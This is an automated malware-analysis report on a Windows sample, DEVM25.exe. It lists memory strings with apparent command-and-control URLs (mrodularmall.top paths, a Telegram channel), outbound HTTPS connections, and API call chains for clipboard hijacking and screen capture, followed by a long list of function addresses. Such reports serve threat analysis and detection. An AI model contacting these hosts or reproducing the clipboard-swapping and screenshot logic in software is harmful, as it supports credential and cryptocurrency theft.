Source: DEVM25.exe, 00000002.00000003.1040674968.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.1048472786.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.1061225731.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.989214929.0000000000AE5000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.1048472786.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.1024350882.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.989228856.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000002.2191965420.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mrodularmall.top/aNzS
Source: DEVM25.exe, 00000002.00000003.1040674968.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.1672292234.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000002.2191865897.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.1672397247.0000000000ABA000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.1048472786.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.1061225731.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mrodularmall.top/aNzS6y
Source: DEVM25.exe, 00000002.00000003.1040674968.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mrodularmall.top/aNzSAy
Source: DEVM25.exe, 00000002.00000003.989214929.0000000000AE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mrodularmall.top/aNzSFB
Source: DEVM25.exe, 00000002.00000003.966232662.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mrodularmall.top/aNzSW
Source: DEVM25.exe, 00000002.00000003.966232662.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mrodularmall.top/aNzSY
Source: DEVM25.exe, 00000002.00000003.989214929.0000000000AE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mrodularmall.top/aNzSyb?
Source: DEVM25.exe, 00000002.00000003.1039180910.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.1040674968.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mrodularmall.top/s
Source: DEVM25.exe, 00000002.00000003.1024350882.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mrodularmall.top:443/aNzS4d
Source: DEVM25.exe, 00000002.00000003.1001954181.000000000379C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: DEVM25.exe, 00000002.00000003.1001954181.000000000379C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: DEVM25.exe, 00000002.00000003.954902553.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.954941594.0000000000A4B000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.966132356.0000000000A4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: DEVM25.exe, 00000002.00000002.2190750469.00000000008FB000.00000004.00000010.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.954876794.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000002.2191116958.0000000000A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/asdawfq
Source: DEVM25.exe, 00000002.00000003.954902553.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.954876794.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: DEVM25.exe, 00000002.00000003.954902553.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.orgPersistent-AuthWWW-AuthenticateVarystel_ssid=13fe98fc6205fb6c6f_858247691958
Source: DEVM25.exe, 00000002.00000003.954902553.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.orgX-Frame-OptionsALLOW-FROM
Source: DEVM25.exe, 00000002.00000003.973003175.0000000003588000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20Y&
Source: DEVM25.exe, 00000002.00000003.973003175.0000000003588000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: DEVM25.exe, 00000002.00000003.1001954181.000000000379C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
Source: DEVM25.exe, 00000002.00000003.1001954181.000000000379C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
Source: DEVM25.exe, 00000002.00000003.1001954181.000000000379C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: DEVM25.exe, 00000002.00000003.1001954181.000000000379C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: DEVM25.exe, 00000002.00000003.1001954181.000000000379C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: DEVM25.exe, 00000002.00000003.1001954181.000000000379C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49689
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49687
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49684
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49683
Source: unknown	Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown	Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49689 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49684 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49687 -> 443

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.9:49683 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.9:49684 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.9:49685 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.9:49687 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.9:49687 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.9:49689 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.9:49691 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.9:49694 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49696 version: TLS 1.2

Source: C:\Users\user\Desktop\DEVM25.exe

Code function: 2_2_0043F640 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

2_2_0043F640

Source: C:\Users\user\Desktop\DEVM25.exe

Code function: 2_2_03201000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,

2_2_03201000

Source: C:\Users\user\Desktop\DEVM25.exe

Code function: 2_2_0043F640 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

2_2_0043F640

Source: C:\Users\user\Desktop\DEVM25.exe

Code function: 2_2_0043F7D0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

2_2_0043F7D0

Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B56460	0_2_00B56460
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B1553B	0_2_00B1553B
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B54CB0	0_2_00B54CB0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B31F50	0_2_00B31F50
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B56090	0_2_00B56090
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B2A0F0	0_2_00B2A0F0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B6E0F0	0_2_00B6E0F0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B690F0	0_2_00B690F0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B7B0F0	0_2_00B7B0F0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B250E0	0_2_00B250E0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B300E0	0_2_00B300E0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B1E030	0_2_00B1E030
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B7A030	0_2_00B7A030
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B3E020	0_2_00B3E020
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B66010	0_2_00B66010
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B11000	0_2_00B11000
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B4D070	0_2_00B4D070
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B6D070	0_2_00B6D070
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B6C050	0_2_00B6C050
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B201A0	0_2_00B201A0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B2F190	0_2_00B2F190
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B141D0	0_2_00B141D0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B741D0	0_2_00B741D0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B48130	0_2_00B48130
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B40110	0_2_00B40110
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B64110	0_2_00B64110
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B47170	0_2_00B47170
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B29150	0_2_00B29150
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B282B0	0_2_00B282B0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B712B0	0_2_00B712B0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B35290	0_2_00B35290
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B172E0	0_2_00B172E0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B822CA	0_2_00B822CA
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B88230	0_2_00B88230
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B72210	0_2_00B72210
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B33200	0_2_00B33200
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B1D250	0_2_00B1D250
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B50240	0_2_00B50240
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B6D3B0	0_2_00B6D3B0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B2E3A0	0_2_00B2E3A0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B453A0	0_2_00B453A0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B3A3F0	0_2_00B3A3F0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B793E0	0_2_00B793E0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B593D0	0_2_00B593D0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B3D330	0_2_00B3D330
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B73330	0_2_00B73330
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B37320	0_2_00B37320
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B51320	0_2_00B51320
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B18310	0_2_00B18310
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B2B310	0_2_00B2B310
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B1A300	0_2_00B1A300
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B39360	0_2_00B39360
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B5A350	0_2_00B5A350
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B60350	0_2_00B60350
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B6C350	0_2_00B6C350
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B3E490	0_2_00B3E490
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B684C0	0_2_00B684C0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B7A4C0	0_2_00B7A4C0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B20430	0_2_00B20430
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B24430	0_2_00B24430
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B63430	0_2_00B63430
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B78420	0_2_00B78420
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B2D410	0_2_00B2D410
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B46410	0_2_00B46410
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B22450	0_2_00B22450
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B35450	0_2_00B35450
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B4C5A0	0_2_00B4C5A0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B95592	0_2_00B95592
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B3B5F0	0_2_00B3B5F0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B4F5D0	0_2_00B4F5D0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B795D0	0_2_00B795D0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B355C0	0_2_00B355C0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B26530	0_2_00B26530
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B33530	0_2_00B33530
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B6F530	0_2_00B6F530
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B23510	0_2_00B23510
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B69576	0_2_00B69576
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B4B560	0_2_00B4B560
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B1E690	0_2_00B1E690
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B65690	0_2_00B65690
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B1B6F0	0_2_00B1B6F0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B366F0	0_2_00B366F0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B486E0	0_2_00B486E0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B4D6E0	0_2_00B4D6E0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B3C6D0	0_2_00B3C6D0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B276C0	0_2_00B276C0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B67630	0_2_00B67630
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B71630	0_2_00B71630
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B20620	0_2_00B20620
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B1C610	0_2_00B1C610
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B51660	0_2_00B51660
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B6A660	0_2_00B6A660
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B59650	0_2_00B59650
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B74640	0_2_00B74640
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B1D7F0	0_2_00B1D7F0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B607F0	0_2_00B607F0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B93718	0_2_00B93718
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B19718	0_2_00B19718
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B1A700	0_2_00B1A700
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B65700	0_2_00B65700
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B29740	0_2_00B29740
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B398A0	0_2_00B398A0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B578A0	0_2_00B578A0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B328C0	0_2_00B328C0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B2D810	0_2_00B2D810
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B4A810	0_2_00B4A810
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B72800	0_2_00B72800
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B4C870	0_2_00B4C870
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B2F860	0_2_00B2F860
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B15856	0_2_00B15856
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B23840	0_2_00B23840
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B289A0	0_2_00B289A0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B18990	0_2_00B18990
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B6D980	0_2_00B6D980
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B4E9C0	0_2_00B4E9C0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B66920	0_2_00B66920
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B2E900	0_2_00B2E900
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B48900	0_2_00B48900
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B1C906	0_2_00B1C906
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B7D90A	0_2_00B7D90A
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B1B960	0_2_00B1B960
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B26940	0_2_00B26940
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B77AB0	0_2_00B77AB0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B27AA0	0_2_00B27AA0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B48AA0	0_2_00B48AA0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B33A90	0_2_00B33A90
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B19AF6	0_2_00B19AF6
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B3DA30	0_2_00B3DA30
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B3CA30	0_2_00B3CA30
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B73A20	0_2_00B73A20
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B61A00	0_2_00B61A00
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B58A70	0_2_00B58A70
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B43A50	0_2_00B43A50
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B6BA40	0_2_00B6BA40
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B67BB0	0_2_00B67BB0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B21BA0	0_2_00B21BA0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B20B90	0_2_00B20B90
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B2DB80	0_2_00B2DB80
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B3ABF0	0_2_00B3ABF0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B4ABF0	0_2_00B4ABF0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B17B00	0_2_00B17B00
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B1CB0F	0_2_00B1CB0F
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B27B50	0_2_00B27B50
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B5EB40	0_2_00B5EB40
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B24C10	0_2_00B24C10
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B32C00	0_2_00B32C00
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B71C00	0_2_00B71C00
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B2EC70	0_2_00B2EC70
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B43C70	0_2_00B43C70
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B32D80	0_2_00B32D80
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B4DD80	0_2_00B4DD80
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B57DF0	0_2_00B57DF0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B15DF6	0_2_00B15DF6
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B20DE0	0_2_00B20DE0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B18DD0	0_2_00B18DD0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B47DD0	0_2_00B47DD0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B4DDD9	0_2_00B4DDD9
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B19D30	0_2_00B19D30
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B4FD20	0_2_00B4FD20
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B39D00	0_2_00B39D00
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B6FD00	0_2_00B6FD00
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B73D60	0_2_00B73D60
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B35EB0	0_2_00B35EB0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B53EA0	0_2_00B53EA0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B52E80	0_2_00B52E80
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B6AE80	0_2_00B6AE80
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B5AEE0	0_2_00B5AEE0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B4AEC0	0_2_00B4AEC0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B3FE20	0_2_00B3FE20
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B30E10	0_2_00B30E10
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B77E10	0_2_00B77E10
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B1DE60	0_2_00B1DE60
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B56F90	0_2_00B56F90
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B6FF90	0_2_00B6FF90
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B36FC0	0_2_00B36FC0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B62FC0	0_2_00B62FC0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B23F20	0_2_00B23F20
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B1BF10	0_2_00B1BF10
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B32F10	0_2_00B32F10
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B6EF10	0_2_00B6EF10
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0040E8EC	2_2_0040E8EC
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0044D960	2_2_0044D960
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_004109D9	2_2_004109D9
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0040BB50	2_2_0040BB50
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00444310	2_2_00444310
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0044AB38	2_2_0044AB38
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0042C54A	2_2_0042C54A
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0042FD50	2_2_0042FD50
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00448550	2_2_00448550
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00417DC0	2_2_00417DC0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0044CE30	2_2_0044CE30
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00437EFB	2_2_00437EFB
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00420F40	2_2_00420F40
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00427FC0	2_2_00427FC0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_004447A0	2_2_004447A0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00401040	2_2_00401040
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0041F84B	2_2_0041F84B
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00404852	2_2_00404852
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00424850	2_2_00424850
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00407066	2_2_00407066
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0040D070	2_2_0040D070
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00445870	2_2_00445870
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00429020	2_2_00429020
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_004090F0	2_2_004090F0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_004138F0	2_2_004138F0
